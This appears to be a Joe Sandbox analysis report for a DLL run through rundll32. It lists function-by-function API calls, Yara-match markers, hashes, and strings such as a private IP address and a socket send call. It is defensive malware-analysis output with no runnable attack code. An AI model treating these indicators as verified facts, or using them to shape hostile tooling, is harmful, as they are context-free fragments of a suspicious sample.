                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 356813703-0
                                                                                                                      • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                      • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Brush
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2798902688-0
                                                                                                                      • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                      • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                        • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                        • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                        • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 63617653-0
                                                                                                                      • Opcode ID: 2a6cfdb99f9de51eb90a51f5ea514ffac437b21a8e7b67f1d76bd152894c2f6f
                                                                                                                      • Instruction ID: 1b2bd9fb6b1df5d5f83e0c816a53a5057bef739e6a7686bc2bbf7ce06708db6b
                                                                                                                      • Opcode Fuzzy Hash: 2a6cfdb99f9de51eb90a51f5ea514ffac437b21a8e7b67f1d76bd152894c2f6f
                                                                                                                      • Instruction Fuzzy Hash: 06F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                      • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                        • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                      • _memset.LIBCMT ref: 1002D2F2
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4021759052-0
                                                                                                                      • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                      • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002D5FF
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                        • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString$H_prolog3_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842698744-0
                                                                                                                      • Opcode ID: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction ID: 1a39fa9d0276ee84c07bd3808c66cb0226ddbd666de5b2da3b26845cb98b16c2
                                                                                                                      • Opcode Fuzzy Hash: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction Fuzzy Hash: 2A414A34900204CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                        • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                        • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                        • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                      • SendMessageA.USER32 ref: 10016A5B
                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1877664794-0
                                                                                                                      • Opcode ID: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction ID: 27039e4540ef9999db1a35b9c590bf271b8d22289eaaf12d3c9627bdabeff3d4
                                                                                                                      • Opcode Fuzzy Hash: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction Fuzzy Hash: CE416A72A00258DBEB30CFA4CC81BDE77A8EF09350F614119E949EB281EB70D9848F52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                      • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                      • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                      • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 670545878-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                      • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                      • GetWindowRect.USER32 ref: 1002059C
                                                                                                                      • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                      • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1315500227-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset
                                                                                                                      • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                      • API String ID: 2102423945-4122032997
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 1529587224-3470857405
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                      • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                      • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                      • API String ID: 2418878492-2500072749
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                      • _memset.LIBCMT ref: 1001579D
                                                                                                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                      • LoadBitmapA.USER32 ref: 10015807
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4271682439-3916222277
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                      • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                      • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2429671754-3916222277
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: System$Metrics$InfoParameters
                                                                                                                      • String ID: B$DISPLAY
                                                                                                                      • API String ID: 3136151823-3316187204
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Edit
                                                                                                                      • API String ID: 0-554135844
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                      • SendMessageA.USER32 ref: 10023CD9
                                                                                                                      • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                      • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                      • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 187318432-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 69039007-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                      • _memset.LIBCMT ref: 10020424
                                                                                                                      • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                      • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 289641511-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                        • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                        • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                        • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                        • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                      • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                        • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                      • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                      • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2731880238-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                      • SetWindowLongA.USER32 ref: 10012989
                                                                                                                        • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LongMenuWindow$AppendSystem
                                                                                                                      • String ID: 192.168.3.85$Message
                                                                                                                      • API String ID: 4121476972-856608562
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      • _strcat.LIBCMT ref: 1001310A
                                                                                                                        • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                      • String ID: :
                                                                                                                      • API String ID: 16450322-3653984579
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                        • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                        • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                      • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                      • API String ID: 3274081130-63838506
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
